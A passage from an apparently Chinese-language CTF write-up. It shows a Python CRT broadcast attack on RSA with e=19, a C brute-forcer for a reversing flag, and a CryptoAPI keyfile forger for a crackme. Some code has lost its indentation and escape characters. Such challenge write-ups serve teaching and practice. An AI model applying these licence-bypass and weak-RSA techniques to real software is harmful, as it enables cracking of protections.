[21648683502998984705866045484544947641100049872713930000863461784192971714383405382729380364813442059921949950269832215961206992010283135651557788608887439348339240389301966222474702327024746998115526572416766189380119518840255063173477318112489526882961355833769916730074219503525366167101177618366403515625636383142156974729031570176443105921652237316791996836488270564442297923460061659842496051191955963907318267799798504658035464886798097464290990706264173092815972652707781598809590103021822291959985975312561624827085690133099378114061849520500494476184201456743692991277561917289123442703987077003912051254473,
0x32519d4dcbe20762cd311f137403d55f2991779a869854303a92937f1c0ac2b3c8de9462335fbdfcfc80a2d49952036fcc3892599846b17f6becf6623db795c9f1ad6ed43f65de285bb12050f3f81eaa31c7b34e3b748d87d4b4d9789844d1c739c7c5cc1493b23e32953e64bf2fbf2ca403827bc8e23b428f306c0e5072d89bb601e66706af21acb54da8bb5a535ce755028b1a59be3682bdd9b8cff60a36ab486361faf68cde5acf1fe590d2fe8fcd130d0de485f172854a02e53b4d80bb223ee41d1bed624fe7ac2579f329a48de2486de9d19a0232878ce2bfd7b203c4234ab7fd28bd5086c1aec9cfa27653b1742ad2bdcdb82df242ef6c3e5330e4955d],
[20724767138767480789498994298180270826474867340264049260163785892907430402804218092022338747569186731211486624552452459080681333244461257729270209985208605897018675854065012585533850704650069878363901187359565209404784010532316397910749437579359276642165787498762432075769088961395447855627224959523061844885375539902930820684607575955490491526386161219430904177417445996609987094669288549224732682905930495022194205987692082118583747810531893061045357968782689580940621512543149340026440955519419499409282989934863220231218154774655263793622174595342915351690552470553775562387235255548900912535073932090872225703057,
0x4e4196a7b0c663ed59ad6674fd59f2a26f9e48e10fcc360d78cb35b5dd641402b32a39e828925b0155eb9f814e88bb5ff36cc0def7dd35d3aed96234507b007f0a0c14d477d2f09dee9f67c587877202d8815c424a14f54b5a19f48f1e939ad16b67fa481d9601734ae7e52bba9c5f54f703992d4a94b3bc3f3c7e25a35dcb51ba8b7fc45dea644262be00037724a09c46d0bac70c43555e37332c35a199707c0cdb8bc1da5a97085d073400e1797c36c726d894819154a6fb6f690c1aecc713b90aa5fe551fa56641d967d162332d10ecd267adf4cd5e90d2df6e0aa52ca1dc59f868719b76e309c59877b193018b8ce9ab50248c4a0c5dad1a30f5614a5804],
[17212295439640377055688217979984966188585299016873359234729084493184304625628968472723004154564887269917061351983063776908774119426411714704687892967543301227423731385323880537283235940428456928620552423667793662090989179432831677965493935878867379869711402693579656408872825837818475666783698699885664597654744848985400925132991151305007305023587591892065687701737374884121128600523652409581330661535968924899805804262941682210140900815439466983734237563778235377066739355624114219934834825916708748496082834506423403378555482105722324867025910662705141921743047391704562848651183325027149054432694683572014622359313,
0x299118bc357f5e546d46209bb096684e336ee29225c2a214537d3a0e0368537e0dfd6780c2890ef87766679e567e388205e34f9cb548afdae574ccae43367e406affc253912972d0f0af7911b0ea9918d80aee4c17e9c21110805fe1bda963cd50c8d58c6a55597195c435b2d923dae945b88baa962bf7ad05fceee1604c29ee27e85d43a5dd0725fbdd721129fda99ff175e9e6e727cfd5e33827f0d0287b950d3866d7b70f31788127499096b5c1067daff65de5c5a0a8f4ab07c75650e222cefe605159f37f57217f5d38521bdee12a1513f75c68963597444ebf33af268e91c5317329fc51f29806c2ad8bdcf1eb46d012258119f4dc23ef8e20c2f10e1a],
[23472084745304537438905071529263024519722889277035896476683227577770819544818596032060798859721968043031781686415577272011705809230515019335765899132906313745385382557516479043323335745414952409295722882945395961430938606533533929117934551622303375595866433725626122966500728243718957556236260244044649471741774062107054178507503595912884900120045195140751307319039397273925472618110765991503036390880137235899571639920592610193895790603572008709664626744807262201364463031075469046249809975209872344454149481525610270451281388871236274366093215907300750793051152749369584542316120901131748833946863340674324510840113,
0xac28242337642cabf950162a965ab69d9f2e2858e732cb0c97bfeecbc965670dacda76edb6e591e07bab71eef52d1ee4e857c8f30682451d5c3b325b185f3a3b5e4d1eb539d94e134a5792c646f60552a87970549c01514b9e2af63e2dadedfa9f732f3d71ed6301ce54a35e01e5d90bb0cc106b8c2833eeacbbab60ab362a87e7e8435ebef01b7f6aa509c09ac44d7ff8da06b3a04103db2f8928ed04ab838291db8badd859c9b65774dded6269a56fd3eb10cc7d1cb6bd737bfcf65e533245657a2c69710318f83b4543713c3c418436342823afd996b10c8d77c2e2a118d4fb1ecbd1b1f16d675292669d8bccaf86f6c1af02e5f7f9ee5c7aeb81c8a111fe],
[16966451712809405570019731700441708658117157522172037602215253538847704156034447243308997644993188593978969328060823028085625093394067251034019534730107585935365736610970376571337190453031629257247350588200661044866750469751891255339636079377813918834503866490352194434851419800977023620974886628642857558663003924383379088864349155389799474130189328454296627295593123465297469526418130015195915305128989852466829730138443688054686459477827471793857648148054429381404542122378207762553439877527124241535549595614223333073179859071395110332611349804722107130361840138060206231273618825678177660378229205324373334941671,
0x19d171bf0005dc1f4d11f80d598687610cc6c062a1d2ace2b2e835f528117df7ccc873553bc413b603c1605335bf5d2cf656e804d39e6ede8c8b4a43014db17aa31aafa9998028a2e87b32d3ec35fd16836c133d80f88a8af86fc7d6fa01540ddfb78615a11f143293d4df73307041d8bd28f186bdc099685ed324abac7980680d86261259a666c64c4c5a0dabdaf01e3700dc4e70a74d3869572ce03a9c4dec97edfb04771907bda0683fe189c3d0e2002352a6c5f85bf7455e5717c7cc9ae13217a0ea04c933837a48e3b356151bdae1004b9828d68e03736cf8fad63d74e8778519b5c3f13ef5fc31ab85c11ab4fc8396def7bc6f690675c30fbcbeb86f93],
[16371772865482869886487545751875918720227349410350898523261337902433007760724960134070658859447185756919127716802819962207343430388160650608047149901674641208010454873466609600454044683586479844130564525332317252829669954436437422430190710090213393780435449488077843816300027728531084047622538708365772411064244675667055162907660820768433907282749095458015341570802297559287990440496065051486970127291015435906143328670495764979798317390225405587270445353337087497780300666784521757559677764504161208852136474658460018703444718680426309315497887622354795698567555861658547811403340467546724028577910903558187895025517,
0x3d81bd9c0aa88eb6bafec40e4198f2c55d56575914d1a7aa81dfb0256b9429f7bcf5a3c7ec01a098a0af98e016b022bec1d035b9f9630938294d3d092328c35f7572c6a8d1c9851ca766c85e4ab676330e7ec1f9f4baa90ca6e5ea3ec024d6af4fcc5f51872037afeceffad441e445155ab8082ff5e0b0291c79ca7ede868a52facfc555ba22b2c75bb2571f3c7916655b9f295a4d87a1cfb554677d646ff813dc59f009345e0a94cbd2075094386c9f10b6aefa28cd3194d3426e10718fea4e3bcb5d1acf6cbe4e586d6bd7332d38f4c53499d80f026166422e15d4ed8e265842423252613b547f8e574c7194c12dd91ef51d31a6671d62ecf8a558d47b1eb6],
[18739467511848988131315883128122206736146672097070557004405077164871943414492542793367542772456096079622940115684730643882776615896515435624865889149736726304993972099711596725868044429964505450412443901512587718466587820372856736565262541517131220786373375774076290256061254661574959523249922650103736767653244522761962914935575618046253094214681141427180945699326806416209977311843049385163987916124881945471029756498039400006754155122103796794625674692744195141047534340245381998599639342203042620610562621504363598354386979425884092857465615040878510573038208953817381038343917618507732344741511873852562526386559,
0x49ffc1accb080b62290fb874f49e7f335d7b8528439118ee0af2644375368e9039da303a9d9147130a231478a26fd19b26ed27fbaefb11f45950d90a6d4e2b47f35c2fd4a723cabe28c3783f6bbcbca563346914b962692c99b8631cbcc9a5d3f919ac572e9e620524b1041a97abb0b0aace32608f9640df04734e753fe9b512f612b6e1f3919dbbe4b85fba1e2d49323b83afae577c2a12b3cadb979df7d2d26c2fee31897654528f53b8a33cb18c23d67edf1540f0b86c9628bf4412bc4c51cc9fed74547e6fff491d5933ca162cf51b040f1e5cbca8e7b107eb86954cedc0981ade1824249a018908682e731ebbaaf91a8e57fe96c99bd207f96fbdbcc827],
[24144341786129954104766079581733537330837102620507111869913290242909722665909732313693428501073644480388840032874928561102010577421641440630875810610561194025475852397890128254251033410935030136931440682117891617143329677926862476615293629003934739648788231326944914357662125163281241165968692544703336639661017133788173441091047645030713078121901474517242196220495605264434833134024329711042776081925978969773964654993763988354885230878890003264935622882822509742717974763221877362961745927680965748429304078786377256344394424563202564595728201265334810076014722298402290831187834158701977930586972158865356896878873,
0x67962b2d35ad0157a54fc22d839fd73b09e51533132ab398f3d1d875d8e1939788c72b715eaf91888f0d34fd5047ec0d1d174516bdde965364f9b8a524f3abdf1ea712fbb0704baedb62cb9e9280073f4089477fedeb91562315bfce12c7161547c1f43d6ef3e150ef7bdcfb73be79dfb31e2488330a6218d75b54da169b9720f810d4cd3e8f3980a00bfd2a9154346626d877f3b4642bf0fe35d062eaa604d06acd3f49b1c1f6d5e2854f0477c1ca7c3b35cc4c043b5371df7b3f13499da5c9fdc35e954decda0ac88f6fc25bd3008af328c58c735197a072c0c66b0993320f62f26622426cafce4ecea8f89c65768b5145be3ee0c3698b14131a22a4d21338],
[16247040679920031441664101450549224846915267128012038160169809988022529023260360238909951721143041506098750506786632479804873106717283201900098824130270193142897664876028831477060651707441899218915076467211315093002467718126490397764923781336660386278054000174333959286629952650900709358893976405952107976000248004574231569517524507462786518216405968877173286766785131219930156964443010273798741079176893106230378140885773941215693338280227658997239881139017743508178569400885510195501403324289981396077715264056372600615755225462706462512671715787636455440243582040421840201486300867068118821338810860117202506391973,
0x144585e5cd2b72208d7462bc84f4de80f3ce6d97071cb0476143c12f6ebe44e48f324b4461fe7ad24361bfb6d3385396c4886326b70a3f57ac69b8149fc70f75409bf98cc6f367db615f0ab51d61089b32f7047f17ce14d020640abe00c63d60b3357b47cbda97ae6f9890ab6d6bd06556da32d4a979ea20fdb8f9de7789c276958b56d66d0f0ccdf2d9783a26192bf2e61aa680a1bdd8149081628920fc481dd83b67c0891eedda5d5d48f5e547bcd9826b2649e15fbe40bdccb69b5bd745d93f4c577652ff7e33aa20e6b0af54f1cfd39184ffb1b2cc976c73b71156375669c6136738b49b84ea52452cb9f69d0c77900ef1ed9794295edb7dde6a8554ee8c],
[18551012655167926464387770233050992041279846989528863834161102801461525909041686843284937371832688980356271778071203519636639066373197007130811728890790984815578763892813131319090045053393183033738145698478609343317261312831760454700959756547277631900724095039747673433562196539586274971886808485264355019830197753253490072205982314028030552566563457089010319394999259879331693348838824426385184308020734644413336706840348430393355769529711286087755105943529953231252927515095975878110907343949357033111430713845084941976511518245681531713980631560482036988551039137934572569534019455625143056327345204129235038932281,
0x6ad6572818211ca2d1448d6cac860de2cb02e03c65f0351552801b722e4e423f5217773ec31571729cb2028364bd3de306a40ca77c4d69beac43132cc226c12ef76b7b0495149bd4873f54016b04f518f7affcd23fc3fad29ebb3db069199313ac3282be96095d780e14815008e112b363df534fa4ed78f63bfffb30b73052de844c0486c4f18ec6726cbc77eb71293409bc73a1f4320ff4d2ec4cf6eba8c0543ba9c56c1af02b4adf2dab1f1138f64fa2b8d4766a97a6de4f79e964aa8e6c0a524c1b4ce25fd0dcbe65883199d2a0460d6476e3ac08a5626b769f6160b67a5b67196ecfd7c973b858864c20472be72e377bb2ef564166a5a87e02c495b621ba],
[22970054162939118362445461906385901439221833049069290764726458403981881590911408985071089915137383136981861486559612240193323004875531479506532933874191827230244142365699779672563892554369800432687990439547057984097138200118421515362503979452326218214213321824595316092046539247639346347874744608465484205324020992798905568751701806473018818314668698663841670163178796042710128542711081575701259392887969466760429477196625304678039933447047554550092450130934454516569529246444043217414963440855561480781027930049264349001859267759734412856962206268528357858432389642710120143436757447094624387962152016825294720909759,
0xa9e70e690c9c8e694935251b7f4c07012190aafbbbdbe81456258abf4d490fa2d42bdf56f7012fa3b1714cd19be108f9e56883b15ac56469d9bb114c4b859d5997aa1ca72c5ad0fceda30ebcd3adfe0429032ebee67900b9cd254b62b079bbe1f447cd2ce112cae53e14fe95e21749c1773e464c369efd8c574d2dd34a232efbee022a9eb52ec5c46ee54ed0f0fc8e71fb35c13d299a86ec8247209f5c3fccf6c0ccb189634ff7339eb50bfb5d4b962ae3e34a8d4570b7296338ad90087fe9ed4b45bfa3348638fb30cf2872a36382ebfac8f9c44fc8932497b68abaf86cd89617e052b88929c435fdf08aef8d54a4eba01f2d458bda554a30e5c52c1b8641d1],
[18385820490756498630845099637385884526289633356624061254787168690401969931484681461188238787710409651449815539895242285691598875337594287806106085813960118251848444451513534016769456481162672885262204482364949325534065459367850614143232825000032268406437960262370858480554819685829353555690184818798267265796210960337460388505948631071614525018398373865470392241959568220037734003523095913661855071969443595963888197246706817509173657520972643733504829106254413721980414281608033521754216197444688277826856307631715943618612743630197485621043314535237634316401434408628915092182191743880308408307741099934272875651987,
0x2e2e5bae9239315b08b9e7df8dcc04ce3dd490a337b5de84b9901f3691854b2e854cdbbb983cef522dce64bd624ada2559966078cfcbca9c9e366dc8657f63a21eff19fa2d112290cb2c0b5a0f27afce836de90f7ed9b9ce0b081e334d214cdf5172ad13f191226a88a19e3f527ae3b2e7a02682acea65a900b5902fdeb77b6d2736c008b480383f7845c98311435b1dca9b2569977e480a18c92d120ea9c7fccc37ac416a60fbbd1c043789b5e71d921b11850c7384ea197403261289ed1435ee29e913452e8efeadfd6869bf740f5ac4b7e2071802917a5507a02d867915d59f1324a06c11fe9448c5a09f344538aaa6c8bcc3eda7b59ac9b7a2c89b69a442],
[30281916388128671870608358127535508597253256848916166571387928324968934483079979882958925265663909078201971328202390856034300501395073515791314797688655243947502728491379898802971897808837840821945579155914942010654535449237742856997639563715044751146534481040770843626744868141893233703484246867149368376045028319062204568784859614394313935507160274207492688072260532253254402466876869799765679537186402458205153674746975112358763817203043791811771234907386018301357938440244542249616472383775389567763247682438890144872967598891063447307931793385215729678598734396687216166714065075625367843216251707716025103121803,
0x1c78ed0ac3656077c3a47c2430d0183cca199670af2aa8192e555a3c0ae2e83946172ee821361cc9570ae66e7b831f25b882adcbd270fe122635e73a2d2b0d2fff28629ae6185d6114ac431dd120d1fc763fbba5ea6d3a178c90ffe4ed086cb09c68c3ab75585172422982e8e61ffe6f3192553f39c23a0d2c57ab91c3b619de0aa0141e50f40cd93e51f6328f10ed6c51f7c7c04c1d241d48a85127db38126fae6dd04a6e5d5d6f4523d50e6971474159d8623a8100d01cade05572d92425d9244d1dda0b391908d35e08119f4be9fdeff188d99ee7a4e9b29b3f3bba0b0cbfe84cc1eeb9fb09dc7d6bd54e1d151f690370e4982f9405f41cf74236f904a2c2],
[29302741920930971715958962931573693059214518175682972760430442992280718862916019621646166196030902557965543474818835511863275094220355276070528714707585419430062500161905041353445117189645307421983574773148466680558589247666101162735815101806414923256492116070184596267543276347976227842158566607582950518639772496229144254482533666634166391371264257444271707628266235679007052272896293396203478855075129665555759478152254177633460469433113536613000536250110508669033238938059179852830430676389056790930463587631527501924598301620386168595636653467177413553747002260512852330933153282102780023107271182594054817150327,
0xdefd52684b8ff42585141f2fde551200860d69ff86c2f05f130f6978952fa0eca4515e60fc81c1d9388bda4baf85eae4f80f9e9c7d56f93b8ba45cdd41d561f1bcc7ba0587fd9f886d1bfd79fdc6d2ee51cc719d61cbd3222df58a41ee602cb0b2f9bad8f763f70b7d73de55b60a041bffbd9d2664b3158bf7b16df52494967fd1c5bdb9e7905a1c8b62b89095c27deae2ec63a5abe9c91cbbe4f12eb1180a98394dd6b1cf2daf1a5262c69eb0abcb9615a84f5109a921f7dcb8867f770b4b1868be10f7745bba6de27a42be500b82142e7e8944dff88a4020902c6aa3feb8dd9a2e6cf0cc5b124546d24a76b784b79c1f304fbcb6c79f99c279bd94abf0b56e],
[18002677742776908491528820233798698716107011799507861113124372495825515833214781580140089594386320512697247643983138319668973871589664314738547953119404190410130072605398757902275389560426168550823398009508361292638241394236790974970017004533432395617773751028770143238013974085907741503747507551735924429318248324672570812709561078983634491336294143952871625167165459876010915038650749052455741224355512827413964858171986208251886493588084872107655861761108227052067451000512173167165942523219966599268848053306963435861831476981263834887084378049610242488632853018135809263417506963270646733008282952382101704197623,
0x5f76fe81f0136f3855d9f1923e0cee1f768b25effd54fec7e1438425ea744b85aa19c9e2e8e175ad43d1da9ea86a7563e98dc0e318abd418e2dff55777b3752288a987f7d3d203f96d9a209a26519a688cdc2b2d9627da7d18eb814c10531bc484acee7bcf38565cd4dc1ed0f2b4304ec539262ea70c49e275246789cb2902f2fe76c6a743f098ae0a30bcc7c88f19145a19ae3ee4433b9ed0bca78ef017a13c8de86f27a8fd987e5f8739e97e6069f46cf1f19bb71b76892abbd6340ab7177d7187b62f281624d54e24016c7abf4c0d28657b509730849a8e209b8e945a7df8c2ddbd43b8050ef97a590e9bb6d50d43a34b676e47a1708cd3927f5570fca0eb],
[17385690967504874659081285807736946558802244288041517042108187672717379329178334496113160801574061465138366148713819592793313683421378505296788697744253648534794396605589753247977329400952848538474618734955207869156808235956879088972178608461737991738408266236322270202640427889796004224608622994615228680554574643862617952688587328074362507938630759071580461843753419996970640803730214623839290577017432774968863067141412380845128948858377887291614971097504289252403156844418437971684066442327908124339274521445039556499162318560060262216457443382532574565448625519147347488322047325049345604859921899415787930385223,
0x869f17d7e1450b0540ec2df5d43f6f82a246ced4b8287352580f77615721bd10b3a7f7c7cb83d63fec965c1a3fc93531e65cd14527d4aa242f36d8ab1af938e312c554afa124dc8dcebf769c8ff6d1b985bb2521606e47c9db658910cb4ac1ee53442cc75d73f89c349160cd62e5be70d02b4efd48bb78b1447c90dc407dfc1e9013f78fb33f185abbb9f59e9a313e2cca36c2c086955d5f9d15804a6417efcde802c60a34dfa54a94580a6bc974f38bd23d128e1418f7b2b7db911649a701ffc1b2a2dc3b85efacf68c33eff648ce77790160ea7d55ec52ddda7fea414690a216c2bd054881f08deb14559ebf33b75926bbd0b0fb3687f9ecce1b1d3a8eb76a],
[21446777415351130147205079896812556144760341131980328457479211003920073547260539842798513238830248313746258553352056758211664220853535491930627715523968038760195452541263513011957735222059270748393755128054967152518850258728721849032492840730694348268277142780367080820887091814886510650523980239380065481822201359742013768435513266872450487992120704903800015695988761833598968601324518342875868803367429998381053968159622275606753821391388526250039179762891270174739748949131134511023830818079526152879733526623540609875826812906910682843202162617139159412105885166373294774501512523937496573675355828762858800843247,
0x24e479052ff3ee7db3b88eaac7072d86f2cbb7e5b3c583d66ed21dd5248529aebe30e45f2159dcf1119f7fd52b67ee80e8ba73320951545df3a28774d4f2e01420736ee32b943a7cceaab11c255d94f334aa0892c5173529021fc448f710f03436a996697fbd0b3a1e296f88d15da4527dfb7ab74347150300be962cc2bbf1d36e79503c38f5c73f354f24fbcf7cbff1a1822c707ab52a8947952ef20e11bf39fcea83fef94d1975b80b07678b8c012798239a8d772ad0c52a3cb2be1f4ab3788e693b07abbb30062037b92bc8b32a13fc9d575b7e0f2b6467fc747b5d7c5a774a836c9e1ce15cee8198ca8215a4ded86419b16661634b08d11baffe5069d60b],
]
data = []
for session in sessions:
e=19
n=session[0]
msg=session[1]
data = data + [(msg, n)]
print "-" * 80
print "Please wait, performing CRT"
x, n = chinese_remainder_theorem(data)
e=19
realnum = gmpy.mpz(x).root(e)[0].digits()
print my_parse_number(int(realnum))
REVERSE
Reverse100(100)
对输入的奇数位字符和偶数位字符做了不同的处理,奇数位的处理
偶数位的处理
最后的校验
拿到flag的代码
#include <stdio.h>
#include <stdlib.h>
void main() {
unsigned char cipher[19] = { 0xBC, 0xEE, 0x7F, 0x4F, 0x3F, 0x53, 0xFA, 0xF8, 0xD8, 0xE8, 0x5E, 0xCE, 0x70, 0xCC, 0x3A, 0xC2, 0x3F, 0x4B, 0x00};
for (int j = 0; j < 18; j++) {
if (j & 1) {
for (unsigned char i = 32; i < 127; i++) {
unsigned char input = i;
input = (input >> 7) | 2 * input;
input ^= 0x24;
if (input <= 0x63)
input += 9;
if (input == cipher[j]) {
printf("%c", i);
}
}
}
else {
for (unsigned char i = 32; i < 127; i++) {
unsigned char input = i;
input += 10;
input = (input >> 3) | 32 * input;
input ^= 0x17;
if (input > 0x2D && input <= 0x37) {
input += 20;
}
if (input == cipher[j]) {
printf("%c", i);
}
}
}
}
}
Flag:SCTF{Se9177entf@u1t_s73}
Reverse150(150)
这题先对输入的name做了DES加密,然后对keyfile进行RSA解密,最后比较他们的值是否相等
我们的思路是拿到name做DES加密后的密文,用RSA加密的公钥对其进行加密就可以得到keyfile,DES加密后的密文可以通过动态调试得到,最重要的一步是获得公钥,程序已经有了私钥,但是PRIVATEKEYBLOB格式的,google了一发,可以先用http://www.jensign.com/JavaScience/PvktoJkey/MSPrivKeytoJKey.java把PRIVATEKEYBLOB格式转换为PKCS#8格式,再用http://www.jensign.com/JavaScience/PvkConvert/PvkConvert.txt得到PUBLICKEYBLOB格式的公钥,最后对所有name的DES密文进行RSA加密就得到了keyfile,还要注意生成的keyfile中不能有0字节,代码如下
#include <iostream>
#include <windows.h>
#include <wincrypt.h>
using namespace std;
void main() {
unsigned char cipher[30][16] = { { 0x93, 0xc6, 0xb5, 0xc3, 0xe0, 0x35, 0x2d, 0xaf, 0xa3, 0x48, 0x6e, 0x41, 0x44, 0xab, 0xe1, 0x3c },
{ 0x7d, 0xa7, 0x85, 0x29, 0xa1, 0x56, 0xb8, 0x53, 0xe1, 0xda, 0x11, 0x6, 0x12, 0x58, 0xad, 0xaf },
{ 0xd4, 0xc2, 0x3, 0x36, 0x50, 0x94, 0x3d, 0x75, 0x67, 0x74, 0x3f, 0x1e, 0x17, 0x76, 0x2d, 0xd1 },
{ 0x37, 0xa7, 0xbe, 0x1d, 0x5d, 0xb1, 0x84, 0x6a, 0x2d, 0xaf, 0x3c, 0x9, 0xe4, 0xf4, 0xd, 0x65 },
{ 0x13, 0x21, 0x49, 0xbe, 0x19, 0x9e, 0xa6, 0x59, 0x1b, 0x2d, 0x22, 0x6f, 0xd1, 0x76, 0x99, 0xaa },
{ 0x8b, 0x17, 0x43, 0xc8, 0xbb, 0xa, 0x23, 0xcb, 0x94, 0xc, 0xfb, 0x67, 0x3a, 0xf0, 0x54, 0x4c },
{ 0xae, 0x7a, 0x7a, 0x6a, 0x89, 0x2c, 0xbf, 0x33, 0x68, 0x47, 0x90, 0x25, 0x9a, 0xc5, 0x5e, 0xe6 },
{ 0xe0, 0x3, 0xa5, 0x9a, 0x73, 0xbf, 0x24, 0x77, 0xcd, 0x99, 0xa1, 0xb7, 0x65, 0x64, 0x9b, 0x57 },
{ 0x46, 0x4d, 0xa6, 0xd0, 0x24, 0xbc, 0x6f, 0x24, 0x20, 0x2d, 0xdf, 0x6e, 0xa8, 0x44, 0x9d, 0xb7 },
{ 0x82, 0x6e, 0xe5, 0x11, 0xda, 0x58, 0xaf, 0x4e, 0x4, 0x92, 0xa4, 0x68, 0xe6, 0xfc, 0x38, 0x6f },
{ 0x17, 0x2d, 0x13, 0xb, 0x7, 0x24, 0x42, 0xc3, 0xe1, 0x4e, 0x51, 0x30, 0x2f, 0x60, 0xf2, 0x9d },
{ 0xfe, 0x6f, 0xf, 0xa7, 0xb9, 0x7a, 0xf4, 0x97, 0x74, 0x82, 0x8f, 0xd3, 0x52, 0xa4, 0xbd, 0xaf },
{ 0x30, 0xb2, 0x1b, 0xef, 0x4, 0x64, 0x6a, 0x72, 0x4a, 0x8f, 0xa0, 0x24, 0xc8, 0x9a, 0x4f, 0xbc },
{ 0x7c, 0xac, 0xe7, 0xac, 0x11, 0xd1, 0x41, 0x5d, 0xf4, 0x88, 0xa6, 0xab, 0x94, 0x64, 0xde, 0x9f },
{ 0x6f, 0x6d, 0x5d, 0x65, 0xa, 0x7, 0x77, 0x4d, 0xf, 0x64, 0xa7, 0xf5, 0x91, 0x74, 0xd4, 0x1 },
{ 0x4e, 0x2, 0x1c, 0xe5, 0xeb, 0x9b, 0xa, 0xca, 0xed, 0x93, 0xc9, 0x20, 0xb5, 0xc1, 0xe5, 0xbf },
{ 0xdb, 0x1e, 0x44, 0x50, 0x88, 0x1c, 0xeb, 0xdb, 0x3c, 0x7b, 0x15, 0x1, 0x4a, 0x20, 0x82, 0x62 },
{ 0xe8, 0xea, 0x4f, 0x8f, 0x45, 0x30, 0x31, 0xd7, 0xac, 0xfa, 0xb6, 0xed, 0x1b, 0x30, 0x6b, 0x38 },
{ 0xf2, 0x6b, 0x59, 0xb3, 0xdf, 0x7d, 0x9d, 0xa3, 0x13, 0xc2, 0x4d, 0xfc, 0xb, 0x43, 0x77, 0x6f },
{ 0x73, 0xc5, 0x49, 0x0, 0x1e, 0x2d, 0x7e, 0x23, 0x58, 0x70, 0x19, 0x8d, 0x90, 0x31, 0x5f, 0x88 },
{ 0xdb, 0x2c, 0xac, 0xc4, 0x9d, 0x12, 0xb4, 0x92, 0x6b, 0x1a, 0xa8, 0x85, 0xbe, 0x34, 0x2e, 0x8e },
{ 0x55, 0xe, 0xdc, 0x5e, 0xb7, 0x74, 0xda, 0xf8, 0x17, 0x5f, 0x1b, 0x77, 0xa4, 0x72, 0xc5, 0x8e },
{ 0xe7, 0xb1, 0x29, 0xe2, 0x3, 0xf5, 0x92, 0x9f, 0x7c, 0x9d, 0x6c, 0xd, 0xb3, 0x5a, 0x38, 0xde },
{ 0xde, 0xfc, 0x71, 0x4e, 0x86, 0xe1, 0x36, 0x29, 0x4e, 0x19, 0x68, 0x2f, 0xfc, 0x66, 0x92, 0x50 },
{ 0xb7, 0xdc, 0x87, 0x8, 0xce, 0x4, 0xd0, 0xc3, 0x70, 0xb0, 0x4c, 0x43, 0x62, 0xda, 0x5b, 0x87 },
{ 0x6a, 0x45, 0x7a, 0x27, 0xe0, 0x2a, 0xf6, 0x7, 0x70, 0x12, 0x7c, 0x28, 0x8f, 0x15, 0xd2, 0x2f },
{ 0xf0, 0xf, 0xf7, 0xbd, 0x92, 0xa, 0x13, 0x54, 0xa7, 0x1d, 0x5b, 0x74, 0x67, 0x4a, 0x17, 0x42 },
{ 0x81, 0x63, 0xcc, 0x58, 0xb6, 0x92, 0xb2, 0x51, 0x16, 0xd2, 0xcd, 0xe4, 0x24, 0x3c, 0xfd, 0x57 },
{ 0x9, 0x59, 0x13, 0xbd, 0x1a, 0x8c, 0xe4, 0xbb, 0x1d, 0xf4, 0xad, 0x46, 0xc6, 0xbd, 0x7a, 0x25 },
{ 0x76, 0xff, 0xa8, 0xaf, 0xe1, 0xe, 0x42, 0x37, 0x59, 0xb4, 0x5f, 0x78, 0xb, 0x48, 0xe1, 0xa7 } };
for (int i = 0; i < 30; i++) {
HCRYPTPROV phProv = 0;
HCRYPTKEY phKey = 0;
DWORD len = 16;
unsigned char text[128] = { 0 };
memcpy(text, cipher[i], 16);
unsigned char pub_key[148] = {
0x06, 0x02, 0x00, 0x00, 0x00, 0xA4, 0x00, 0x00, 0x52, 0x53, 0x41, 0x31,
0x00, 0x04, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0xF7, 0x4A, 0x9D, 0x9B,
0xAA, 0x80, 0x5A, 0x89, 0x8C, 0x00, 0x0A, 0x7B, 0xE2, 0xDC, 0x59, 0x9D,
0x3E, 0xF1, 0x9D, 0x10, 0x33, 0xD8, 0xF6, 0xA5, 0x60, 0xC3, 0x20, 0xBA,
0xC7, 0x21, 0x80, 0x08, 0x53, 0xDB, 0x5E, 0x60, 0x05, 0x65, 0xD0, 0xF5,
0x88, 0xA4, 0x0C, 0x76, 0x8D, 0x42, 0xEF, 0x27, 0xDB, 0x83, 0x79, 0xD7,
0xCC, 0xDB, 0x43, 0x9F, 0x7E, 0xDF, 0xCA, 0xC3, 0x62, 0x46, 0xD8, 0x3C,
0xEA, 0x8D, 0xD4, 0x48, 0x04, 0xC0, 0xC7, 0xD9, 0xD3, 0xFF, 0xB0, 0xF5,
0x0C, 0x0D, 0x82, 0xDE, 0x6D, 0x0B, 0x20, 0xCB, 0x8C, 0x79, 0xAD, 0x98,
0xFE, 0x32, 0xC4, 0x9F, 0x19, 0xE1, 0xDA, 0x16, 0xFE, 0xDA, 0x5E, 0x52,
0xE4, 0xBF, 0xC5, 0x2F, 0x06, 0x32, 0x73, 0x1A, 0xDF, 0xC5, 0x56, 0x37,
0xFC, 0xC0, 0xAB, 0x40, 0xBE, 0x0B, 0x66, 0x6E, 0xA2, 0x74, 0x06, 0x66,
0x7E, 0x42, 0xCD, 0xD9
};
if (CryptAcquireContext(
&phProv,
NULL,
"Microsoft Enhanced Cryptographic Provider v1.0",
PROV_RSA_FULL,
CRYPT_VERIFYCONTEXT)) {
if (CryptImportKey(phProv, pub_key, 148, 0, 0, &phKey)) {
if (CryptEncrypt(phKey, 0, true, 0, text, &len, 128)) {
printf("successn");
char filename[15] = { 0 };
sprintf(filename, "key%d.txt", i + 1);
FILE* file = fopen(filename, "w");
fwrite(text, 1, 128, file);
fclose(file);
}
else {
printf("error3n");
}
}
else {
printf("error2n");
}
}
else {
printf("error1n");
}
}
}
Reverse200(200)
可执行文件是个install4j的程序,用procmon监控进程文件操作能够提取出一个trustme.jar,用jd-gui打开发现jar经过混淆,静态分析发现得出的算法是错误的。于是用IDEA设置Path to jar进行调试,发现动态加载了一个类,里面是关键函数,然后写脚本倒推即可。
脚本:
#!/usr/bin/env python2
# -*- coding:utf-8 -*-
from ctypes import *
def u8(x):
return c_uint8(x).value
result = [-81, 52, 52, -39, -64, 43, 49, -116, -100, -115, -81, -119, 34, -7, 56, 92, 23, 78, 115, -120, 77, 83, -22]
